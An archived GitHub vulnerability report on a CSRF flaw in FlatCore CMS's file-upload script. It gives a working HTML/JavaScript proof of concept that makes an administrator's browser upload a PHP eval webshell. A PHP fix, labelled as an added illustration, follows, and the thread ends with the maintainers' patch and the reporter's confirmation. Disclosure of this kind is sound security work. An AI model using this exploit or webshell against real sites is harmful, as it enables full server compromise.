This repository has been archived by the owner on Jan 5, 2023. It is now read-only.

Bug Report: CSRF Vulnerability in files.upload-script.php on FlatCore #39

Closed
4rog opened this issue May 26, 2019 · 3 comments

Comments

4rog commented May 26, 2019

Title: CSRF Vulnerability in files.upload-script.php on FlatCore
Date: 26-May-2019
Discovered by: @Satuer from ABT Labs
Security: high (allows a webshell to be uploaded)
Software: https://github.com/flatCore/flatCore-CMS/archive/1.4.7.4.zip

Code: files.upload-script.php
There is no CSRF check, only an administrator check. (Moreover, there is no check on the file type, and the uploaded file name is not changed.)

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background.

Exploit:
We assume that FlatCore is installed at http://192.168.62.129/flatCore. Our target is acp/core/files.upload-script.php which is the page used to upload a new file. The given POC will upload a webshell to the website.

```html
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "/flatCore/acp/core/files.upload-script.php", true);
xhr.setRequestHeader("Accept", "application/json");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=--------795986992");
xhr.withCredentials = "true";
var body = "----------795986992\r\n" +
"Content-Disposition: form-data; name=\"upload_destination\"\r\n" +
"\r\n" +
"../content/\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"w\"\r\n" +
"\r\n" +
"600\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"h\"\r\n" +
"\r\n" +
"500\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"fz\"\r\n" +
"\r\n" +
"2800\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"unchanged\"\r\n" +
"\r\n" +
"\r\n" +
"----------795986992\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"testwebshell.php\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php eval($_REQUEST['parm']);?>\r\n" +
"----------795986992--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
```

Before visiting the PoC, make sure you are logged in to an administrator account. Then open the HTML file and submit the form. The webshell has now been uploaded.

Screenshots:
First, the administrator logs in.

Then, the administrator visits the malicious webpage.

The attacker visits the webshell.

Suggestion: Check CSRF tokens in all POST requests.
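A server-side check of the kind the report suggests, added here as an illustration and not FlatCore's own code or fix. It assumes PHP sessions are in use, a POST field named `csrf_token`, and a `../content/` upload directory; it also addresses the two side observations in the report (no file-type check, unchanged file name).

```php
<?php
// Added illustration, not FlatCore's code. Assumes PHP sessions are in use and that
// the upload form carries the token in a POST field named "csrf_token" (assumed name).
session_start();

// Issue one token per session; the form embeds it as a hidden field.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison. A page on another origin (like the PoC above) cannot
// read the token, so its forged POST arrives without a valid one and is rejected.
function csrf_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

// Hidden field to emit next to the file input of the upload form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Upload handler: keep the existing administrator check, then verify the token
// before touching $_FILES at all.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // Allow-list the extension and generate the stored name server-side,
    // so a client-supplied "testwebshell.php" is neither accepted nor kept.
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
    $ext = strtolower(pathinfo($_FILES['file']['name'] ?? '', PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        http_response_code(400);
        exit('File type not allowed');
    }
    $dest = __DIR__ . '/../content/' . bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($_FILES['file']['tmp_name'] ?? '', $dest)) {
        http_response_code(500);
        exit('Upload failed');
    }
}
```

Marking the session cookie `SameSite=Lax` is a useful second layer: most browsers then omit it from a cross-origin POST like the one in the PoC, even before the token check runs.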

patkon (Member) commented May 28, 2019

Thank you! I will fix this as soon as possible.

patkon (Member) commented Jun 12, 2019

Check CSRF tokens before uploading files
13892f9

4rog (Author) commented Jun 13, 2019

Verified, no longer works.

4rog closed this as completed Jun 13, 2019